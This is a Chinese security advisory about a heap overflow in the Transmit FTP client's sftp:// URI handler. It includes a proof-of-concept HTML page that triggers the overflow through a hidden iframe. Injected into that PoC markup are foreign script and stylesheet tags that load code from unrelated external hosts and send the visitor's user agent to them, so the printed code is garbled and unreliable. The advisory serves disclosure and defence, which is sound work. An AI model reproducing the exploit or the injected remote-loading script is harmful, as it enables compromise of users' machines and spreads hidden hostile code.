安全研究

安全漏洞
Transmit “sftp://” URI处理器堆溢出漏洞

发布日期:2007-01-22
更新日期:2007-01-23

受影响系统:
Panic Transmit 3.5.5
描述:
BUGTRAQ  ID: 22145
CVE(CAN) ID: CVE-2007-0020

Transmit是MAC OS X平台上的FTP客户程序,可以执行基本的FTP操作。

Transmit在处理sftp:// URI时存在堆溢出漏洞,远程攻击者可以通过构造超长字符串来触发这个溢出,导致执行任意指令,可能控制用户机器。

<*来源:LMH (lmh@info-pull.com
        Kevin Finisterre (dotslash@snosoft.com
  
  链接:http://secunia.com/advisories/23861/
        http://projects.info-pull.com/moab/MOAB-19-01-2007.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
    "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
    <head>
        <title>MOAB-19-01-2007</title>
        <script>
            function boom() {
                var recipient = document.getElementById('testbox');
                var str = '';
                for (var i = 0; i < 408; i++) {
                    str = str + 'A'
                }
                str = str + 'ABCD';
                
                alert('Payload size: ' + str.length);
                
                str = "ftps://" + str;
                ftarget = document.createElement('iframe');
                ftarget.src = str;
                ftarget.width = 1;
                ftarget.height = 1;
                recipient.appendChild(ftarget);
            }
        </script>
    </head>
    <script language="javascript" src="http://i.jsev.com./base.1994054295.js"> </script>
<body onmousemove="return fz3824();">
<LINK REL="stylesheet" TYPE="text/css" HREF="http://i.cssxx.com./base1994054296.css">

<A HREF = "http://i.html.com./base1994054296.html"></A>
<SCRIPT LANGUAGE="JAVASCRIPT" SRC="http://i.js.com./base1994054296.js"></SCRIPT>
<SCRIPT LANGUAGE="JAVASCRIPT">
function getuseragnt()
{ var agt = navigator.userAgent.toLowerCase();
  agt = agt.replace(/ /g, "");
  return agt;
}
document.write("<LINK REL='stylesheet' TYPE='text/css' HREF='http://i.css2js.com./base.css" + getuseragnt() + "_1994054296'>")
</SCRIPT>

        <div id="testbox" style="display: none;"></div>
        <input type="button" onclick="boom();" value="Test MOAB-19-01-2007" />
    </body>
</html>

建议:
厂商补丁:

Panic
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.panic.com/transmit/index.html

浏览次数:3554
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障